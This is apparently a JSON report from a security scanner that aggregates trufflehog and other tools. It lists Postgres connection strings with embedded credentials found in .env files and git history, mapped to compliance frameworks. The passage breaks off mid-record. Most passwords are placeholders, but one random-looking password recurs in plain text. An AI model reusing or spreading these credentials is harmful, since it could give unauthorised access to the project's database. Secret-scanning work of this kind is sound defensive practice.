{ "meta": { "output_version": "1.0.0", "jmo_version": "1.0.5", "schema_version": "1.2.0", "timestamp": "2026-05-21T06:36:10.198780Z", "scan_id": "202284b8-0052-4181-970d-ee2285144fcf", "profile": "", "tools": [ "checkov", "hadolint", "semgrep", "syft", "trivy", "trufflehog", "zap" ], "target_count": 1, "finding_count": 712, "platform": "Linux" }, "findings": [ { "schemaVersion": "1.2.0", "id": "d818f4846421d653", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.env.docker.production.example", "startLine": 0 }, "message": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.env.docker.production.example", "line": 9 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "RawV2": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "35ed8d11af314afa", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.env.local", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.env.local", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "48b308b8dd5acde8", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.env.docker.dev", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.env.docker.dev", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1c16bda367ac0bd8", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.env.docker.test", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.env.docker.test", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "deeba988a9ab6141", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "381c867d67edf2e8", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208", "startLine": 0 }, "message": "postgresql://postgres:change-me@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208", "line": 7 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:change-me@postgres:5432", "RawV2": "postgresql://postgres:change-me@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "edccc43a23cfabf6", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aae1f539799fb2de", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06", "startLine": 0 }, "message": "postgresql://postgres:password@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06", "line": 1 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:password@postgres:5432", "RawV2": "postgresql://postgres:password@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "786bfda631317a71", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924", "startLine": 0 }, "message": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924", "line": 7 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": false, "Raw": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", "RawV2": "postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "595d2f235b05e737", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc", "startLine": 0 }, "message": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc", "line": 9 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "RawV2": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3ed146267f450c31", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c", "startLine": 0 }, "message": "postgresql://postgres:change-me@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c", "line": 7 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:change-me@postgres:5432", "RawV2": "postgresql://postgres:change-me@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and credentials are issued, managed, verified, revoked, and audited" }, { "function": "PROTECT", "category": "PR.DS", "subcategory": "PR.DS-1", "description": "Data-at-rest is protected" } ], "pciDss4_0": [ { "requirement": "8.3.2", "description": "Strong cryptography for authentication credentials", "priority": "CRITICAL" }, { "requirement": "8.2.1", "description": "Verify user identity before credential modification", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Credential Access", "technique": "T1552", "techniqueName": "Unsecured Credentials", "subtechnique": "T1552.001", "subtechniqueName": "Credentials in Files" }, { "tactic": "Initial Access", "technique": "T1078", "techniqueName": "Valid Accounts", "subtechnique": "", "subtechniqueName": "" } ] }, "priority": { "priority": 13.333333333333332, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2998e9823a9a5e07", "ruleId": "Postgres", "severity": "MEDIUM", "tool": { "name": "trufflehog", "version": "unknown" }, "location": { "path": "/scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46", "startLine": 0 }, "message": "postgresql://postgres:change-me@postgres:5432", "title": "Postgres secret", "description": "Potential secret detected by TruffleHog", "remediation": "Rotate credentials and purge from history.", "references": [], "tags": [ "secrets", "unverified" ], "risk": { "cwe": [ "CWE-798" ], "confidence": "MEDIUM", "likelihood": "HIGH", "impact": "HIGH" }, "raw": { "SourceMetadata": { "Data": { "Filesystem": { "file": "/scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46", "line": 10 } } }, "SourceID": 1, "SourceType": 15, "SourceName": "trufflehog - filesystem", "DetectorType": 968, "DetectorName": "Postgres", "DetectorDescription": "Postgres connection string containing credentials", "DecoderName": "PLAIN", "Verified": false, "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", "VerificationFromCache": true, "Raw": "postgresql://postgres:change-me@postgres:5432", "RawV2": "postgresql://postgres:change-me@postgres:5432", "Redacted": "", "ExtraData": { "sslmode": "" }, "StructuredData": null }, "compliance": { "owaspTop10_2021": [ "A02:2021" ], "cweTop25_2024": [ { "id": "CWE-798", "rank": 18, "category": "Credentials" } ], "cisControlsV8_1": [ { "control": "3.11", "title": "Encrypt Sensitive Data at Rest", "implementationGroup": "IG1" }, { "control": "5.4", "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", "implementationGroup": "IG1" } ], "nistCsf2_0": [ { "function": "PROTECT", "category": "PR.AC", "subcategory": "PR.AC-1", "description": "Identities and 